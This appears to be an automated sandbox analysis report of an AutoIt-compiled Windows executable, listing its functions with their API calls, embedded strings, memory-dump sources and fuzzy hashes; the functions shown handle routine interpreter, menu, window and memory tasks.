Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 366b569bcb7b0e551057331261e5fefa304e17186ab87fd7c165d83857ecfd8e
Instruction ID: 848623075d90e344c362ce48f0b93cda10f375f6d5d9984faa1c173413e6a756
Opcode Fuzzy Hash: 366b569bcb7b0e551057331261e5fefa304e17186ab87fd7c165d83857ecfd8e
Instruction Fuzzy Hash: 6D41C435014140AFDB256F28DC98BF93B69FB0A331F194266FE658B1E6DB308D42DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00AB4D37, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00AB4D62
__swprintf.LIBCMT ref: 00AB4DAC
__i64tow.LIBCMT ref: 00AEDB3B

Strings

%.15g, xrefs: 00AB4DA6
False, xrefs: 00AEDB03
True, xrefs: 00AEDAFC
0x%p, xrefs: 00AEDB1D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: e88c4d8d3d7f32208dca450b20ab34d9ad05590ebcaefbd525781f95148f26fc
Instruction ID: 1d45f6759c8aac5e5516b84eb89fb4a0f645f80641a91f94024e648c184b4afe
Opcode Fuzzy Hash: e88c4d8d3d7f32208dca450b20ab34d9ad05590ebcaefbd525781f95148f26fc
Instruction Fuzzy Hash: DA41B472604209AFEB34DF78D941EBA73F8EB49340F20446EE14AD7393EA719A41C711

Uniqueness

Uniqueness Score: -1.00%

Function 00AD7030, Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AD706B

Part of subcall function 00AD8D58: __getptd_noexit.LIBCMT ref: 00AD8D58

__gmtime64_s.LIBCMT ref: 00AD7104
__gmtime64_s.LIBCMT ref: 00AD713A
__gmtime64_s.LIBCMT ref: 00AD7157
__allrem.LIBCMT ref: 00AD71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD71C9
__allrem.LIBCMT ref: 00AD71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD71FE
__allrem.LIBCMT ref: 00AD7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD7233
__invoke_watson.LIBCMT ref: 00AD72A4

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 5184291754d359e5a32db96617999986fe51cdf3b5afc46a846ccfe8cf071313
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 9271F372A04756ABDB189B79CD82B9EB3B8AF54320F14422BF515E73C1F770DA408790

Uniqueness

Uniqueness Score: -1.00%

Function 00B12CCE, Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B12CE9
GetMenuItemInfoW.USER32(00B77890,000000FF,00000000,00000030), ref: 00B12D4A
SetMenuItemInfoW.USER32 ref: 00B12D80
Sleep.KERNEL32(000001F4), ref: 00B12D92
GetMenuItemCount.USER32 ref: 00B12DD6
GetMenuItemID.USER32(?,00000000), ref: 00B12DF2
GetMenuItemID.USER32(?,-00000001), ref: 00B12E1C
GetMenuItemID.USER32(?,?), ref: 00B12E61
CheckMenuRadioItem.USER32 ref: 00B12EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B12EBB
SetMenuItemInfoW.USER32 ref: 00B12EDC

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 392cf37ea100317f095c1b5b2e0c4df4aa470557eb8403aeb32cf0b21f8f96ae
Instruction ID: 18a9229a8b4cdd363402fe27456ddf59c3141faf2d1f2f4496b03b6d42548117
Opcode Fuzzy Hash: 392cf37ea100317f095c1b5b2e0c4df4aa470557eb8403aeb32cf0b21f8f96ae
Instruction Fuzzy Hash: 64619C71900249AFDF10DF64DC88AEE7BF8FB01304F9440A9F951A7251DB31AEA5CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00B077B6, Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B077DD
SafeArrayAllocData.OLEAUT32(?), ref: 00B07836
VariantInit.OLEAUT32(?), ref: 00B07848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B07868
VariantCopy.OLEAUT32(?,?), ref: 00B078BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B078CF
VariantClear.OLEAUT32(?), ref: 00B078E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00B078F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B078FA
VariantClear.OLEAUT32(?), ref: 00B0790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B07917

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c4bd427e5c05ae61afe9194930d18571b4451215e85d9811548bff0503708381
Instruction ID: b941d1bae4b60aee56172e11dd48662deb76b9579af8605c8adfb7c7c33e099c
Opcode Fuzzy Hash: c4bd427e5c05ae61afe9194930d18571b4451215e85d9811548bff0503708381
Instruction Fuzzy Hash: D2411035E14219AFDB00DFA4D8489ADBFF9FF48354F0084A9EA55A7361DB30AA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B09B47, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00B0B79A: GetClassNameW.USER32 ref: 00B0B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B09BCC
GetDlgCtrlID.USER32 ref: 00B09BD7
GetParent.USER32 ref: 00B09BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B09BF6
GetDlgCtrlID.USER32(?), ref: 00B09BFF
GetParent.USER32(?), ref: 00B09C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B09C1E

Strings

ListBox, xrefs: 00B09B89
ComboBox, xrefs: 00B09B54

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: ea0c9cfa074e47c08b018b4b94a60f1fde34d840ad515a876ac7ef111d0b9766
Instruction ID: d2804a9f46f607cb35a0f20529b0fbfc9b6bcb817f6b349aa7fe4a199294f7ad
Opcode Fuzzy Hash: ea0c9cfa074e47c08b018b4b94a60f1fde34d840ad515a876ac7ef111d0b9766
Instruction Fuzzy Hash: 0C21F175A01104ABDF00EB64CC85EFEBBB4EF96310F000155F962932E2DF7499159A20

Uniqueness

Uniqueness Score: -1.00%

Function 00B09C32, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00B0B79A: GetClassNameW.USER32 ref: 00B0B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B09CB5
GetDlgCtrlID.USER32 ref: 00B09CC0
GetParent.USER32 ref: 00B09CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B09CDF
GetDlgCtrlID.USER32(?), ref: 00B09CE8
GetParent.USER32(?), ref: 00B09D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B09D07

Strings

ListBox, xrefs: 00B09C74
ComboBox, xrefs: 00B09C3F

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 3ae8501a84e015f9bd0a23b83910c801957d1af8f74c47e4285e02d943438b42
Instruction ID: c248445a944d09bd5bae822ef2271ec1d844b34c148775e69466d61da2e9417b
Opcode Fuzzy Hash: 3ae8501a84e015f9bd0a23b83910c801957d1af8f74c47e4285e02d943438b42
Instruction Fuzzy Hash: 70210076E41104BBDF00EBA0CC85EFEBBB8EF96300F100155FA52932E2DB3589259A20

Uniqueness

Uniqueness Score: -1.00%

Function 00B09D1B, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B09D27
GetClassNameW.USER32 ref: 00B09D3C
_wcscmp.LIBCMT ref: 00B09D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B09DC9

Strings

largeicons, xrefs: 00B09D5D
smallicons, xrefs: 00B09D91
details, xrefs: 00B09D77
SHELLDLL_DefView, xrefs: 00B09D48
list, xrefs: 00B09DAB

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 27d3b97f1d5cc8d9d19f774c4232619ac903aed831d146819a010f05b624ff2a
Instruction ID: 93e795b20d2b324e1173db4b0b8517ca44d4497e018bdefa3edadb6e19cf01bc
Opcode Fuzzy Hash: 27d3b97f1d5cc8d9d19f774c4232619ac903aed831d146819a010f05b624ff2a
Instruction Fuzzy Hash: 911150BB28931379FE006610EC07DA677DCEB11760B2042B7FA12B10E2FF655E100952

Uniqueness

Uniqueness Score: -1.00%

Function 00B17F4B, Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B18027

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 9b00ab28717d4160234cda55625a65ed4b0582a9c8a1496dcfdf0489f38ca288
Instruction ID: b6fb2a99b07f237cf7476e081a1e989cd778238b9498b0eb816f4c8d815ad2fd
Opcode Fuzzy Hash: 9b00ab28717d4160234cda55625a65ed4b0582a9c8a1496dcfdf0489f38ca288
Instruction Fuzzy Hash: C9B19D75A0421A9FDB01DF94D884BFEB7F5FF09321F6044A9E601EB251DB34A981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ABAD98, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00ABADE1
OleUninitialize.OLE32(?,00000000), ref: 00ABAE80
UnregisterHotKey.USER32(?), ref: 00ABAFD7
DestroyWindow.USER32(?), ref: 00AF2F64
FreeLibrary.KERNEL32(?), ref: 00AF2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF2FF6

Strings

close all, xrefs: 00ABADDC

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a2f828a79a157ac905c77b5b3ac6fc2b9c176060e78eab92101246b415d1dbe0
Instruction ID: d21e0ade64ffc9d4288d9bcad2ca0328f8dea881d1f4103c2213188151bd96ae
Opcode Fuzzy Hash: a2f828a79a157ac905c77b5b3ac6fc2b9c176060e78eab92101246b415d1dbe0
Instruction Fuzzy Hash: 23A148317022128FCB29EF54C595BA9F7A4BF14700F5542ADF90AAB252DB31AE12CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B3C634, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

Part of subcall function 00AB2714: GetCursorPos.USER32(?,?,00B777B0,?,00B777B0,00B777B0,?,00B3C5FF,00000000,00000001,?,?,?,00AEBD40,?,?), ref: 00AB2727
Part of subcall function 00AB2714: ScreenToClient.USER32 ref: 00AB2744
Part of subcall function 00AB2714: GetAsyncKeyState.USER32(00000001), ref: 00AB2769
Part of subcall function 00AB2714: GetAsyncKeyState.USER32(00000002), ref: 00AB2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B3C69C
ImageList_EndDrag.COMCTL32 ref: 00B3C6A2
ReleaseCapture.USER32 ref: 00B3C6A8
SetWindowTextW.USER32(?,00000000), ref: 00B3C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B3C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B3C847

Strings

@GUI_DRAGFILE, xrefs: 00B3C7DC
@GUI_DROPID, xrefs: 00B3C799

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 4d230dec633c8cddcf44acb76f87e56ba7b41fa18e31b2baf8a157fe4f449963
Instruction ID: 8ef08967e3efa57fe0f274bb6f90dc4d01326c99d330c545a531a7396f0c0730
Opcode Fuzzy Hash: 4d230dec633c8cddcf44acb76f87e56ba7b41fa18e31b2baf8a157fe4f449963
Instruction Fuzzy Hash: 2E518D71208304AFDB14EF14CC5AFAA7BE5FB88310F10855DF999972A2CF30AA55CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2F42, Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00AEC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AEC65A
LoadImageW.USER32 ref: 00AEC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00AEC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AEC6B1
DestroyIcon.USER32(00000000), ref: 00AEC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AEC6DD
DestroyIcon.USER32(?), ref: 00AEC6EC

Part of subcall function 00B3AAD4: DeleteObject.GDI32(00000000), ref: 00B3AB0D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: f8267308fe3c3e5bbdc7a43954fb26d6e19f4da2f1931c824eb16b5adbce05e7
Instruction ID: 31c786fa2b5637b2053e3e7b88fb1b6ee4c3beef9fb9fca0985ca75b8c1a971f
Opcode Fuzzy Hash: f8267308fe3c3e5bbdc7a43954fb26d6e19f4da2f1931c824eb16b5adbce05e7
Instruction Fuzzy Hash: 34517874610209AFDB20DF25CC45FAA7BB9FB48720F104529F946A72A0DB70EDA1DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B094D9, Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B0915A,00000B00,?,?), ref: 00B094E2
HeapAlloc.KERNEL32(00000000,?,00B0915A,00000B00,?,?), ref: 00B094E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B0915A,00000B00,?,?), ref: 00B094FE
GetCurrentProcess.KERNEL32(?,00000000,?,00B0915A,00000B00,?,?), ref: 00B09506
DuplicateHandle.KERNEL32(00000000,?,00B0915A,00000B00,?,?), ref: 00B09509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B0915A,00000B00,?,?), ref: 00B09519
GetCurrentProcess.KERNEL32(00B0915A,00000000,?,00B0915A,00000B00,?,?), ref: 00B09521
DuplicateHandle.KERNEL32(00000000,?,00B0915A,00000B00,?,?), ref: 00B09524
CreateThread.KERNEL32 ref: 00B0953E

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 6f5778aa52c595ae1d779c72019427786dc02575915a3ad6736c323ee69d581a
Instruction ID: b40229a4c2f1e200ee7eef73c8d829dbbf46f9f9bfb7ffbafe7a65039a5b2a0a
Opcode Fuzzy Hash: 6f5778aa52c595ae1d779c72019427786dc02575915a3ad6736c323ee69d581a
Instruction Fuzzy Hash: 0501BBB9250304BFE710ABA5DC4DF6B7BACFB89711F004411FB05DB1A1CA709900CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A20D, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00B2A265
NULL Pointer assignment, xrefs: 00B2A28E, 00B2A5B2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 1be7187d134967a2256945ccf2bf3824f33802c78d58fd8a691948d4ad94e39c
Instruction ID: 24a1bcce8cab7e9e99304914a93b983d0ba2f211e5696daf39a5f3160bc05f63
Opcode Fuzzy Hash: 1be7187d134967a2256945ccf2bf3824f33802c78d58fd8a691948d4ad94e39c
Instruction Fuzzy Hash: 99C1A371A0022A9FDF10DF98E885AAEB7F5FF58310F1484A9E919E7280E770ED45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B297FD, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B29851
VariantInit.OLEAUT32(?), ref: 00B29922
VariantInit.OLEAUT32(?), ref: 00B29A23
VariantClear.OLEAUT32(?), ref: 00B29A2D
VariantClear.OLEAUT32(?), ref: 00B29A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00B29A06
Null Object assignment in FOR..IN loop, xrefs: 00B298B2, 00B299E0, 00B29A98

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 2c2b07780be6e00af00e680ad81e4725b1b36ddfa5676b05b59c65a276460a8d
Instruction ID: 23e3f52c3131d15d8da2f02ff66382f7b90d448e34eca298b6ad390a4fefea14
Opcode Fuzzy Hash: 2c2b07780be6e00af00e680ad81e4725b1b36ddfa5676b05b59c65a276460a8d
Instruction Fuzzy Hash: 8B919E71A00229ABDF24CFA5E884FAEB7F8EF46710F10859DF51DAB241D7709940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B19B16, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00AC4A8C: _fseek.LIBCMT ref: 00AC4AA4

Part of subcall function 00B19CF1: _wcscmp.LIBCMT ref: 00B19DE1
Part of subcall function 00B19CF1: _wcscmp.LIBCMT ref: 00B19DF4

_malloc.LIBCMT ref: 00B19C13
_malloc.LIBCMT ref: 00B19C1D
_free.LIBCMT ref: 00B19C5F
_free.LIBCMT ref: 00B19C66
_free.LIBCMT ref: 00B19CD1

Part of subcall function 00AD2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AD9C54,00000000,00AD8D5D,00AD59C3), ref: 00AD2F99
Part of subcall function 00AD2F85: GetLastError.KERNEL32(00000000,?,00AD9C54,00000000,00AD8D5D,00AD59C3), ref: 00AD2FAB

_free.LIBCMT ref: 00B19CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B19B8F

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$_malloc_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2231465579-2806939583
Opcode ID: 04eeba00b278a717873071e15bd1643fc37ed1a4e7a5a878d24f0d021c91af8a
Instruction ID: 968f85262893ef2623c2dc585a4f4922e740167fc3b993a5b47241468a63d8d0
Opcode Fuzzy Hash: 04eeba00b278a717873071e15bd1643fc37ed1a4e7a5a878d24f0d021c91af8a
Instruction Fuzzy Hash: CC5127B1D04259ABDF249F64DC95AEEBBB9FF48304F0004AEB649A3341DB715A90CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00AC56F8, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B00C5B

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

_memset.LIBCMT ref: 00AC5787
_wcscpy.LIBCMT ref: 00AC57DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AC57EB
__swprintf.LIBCMT ref: 00B00CD1

Strings

Line %d: , xrefs: 00B00CCB
AutoIt - , xrefs: 00AC5760

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: f9151fc465f41c0ed852f8807f91829d90c915f7f70279b945e426e65066f741
Instruction ID: 57f41caef6611c0dbf59e47107490b06273f6bd35407576060d434dbe3cba810
Opcode Fuzzy Hash: f9151fc465f41c0ed852f8807f91829d90c915f7f70279b945e426e65066f741
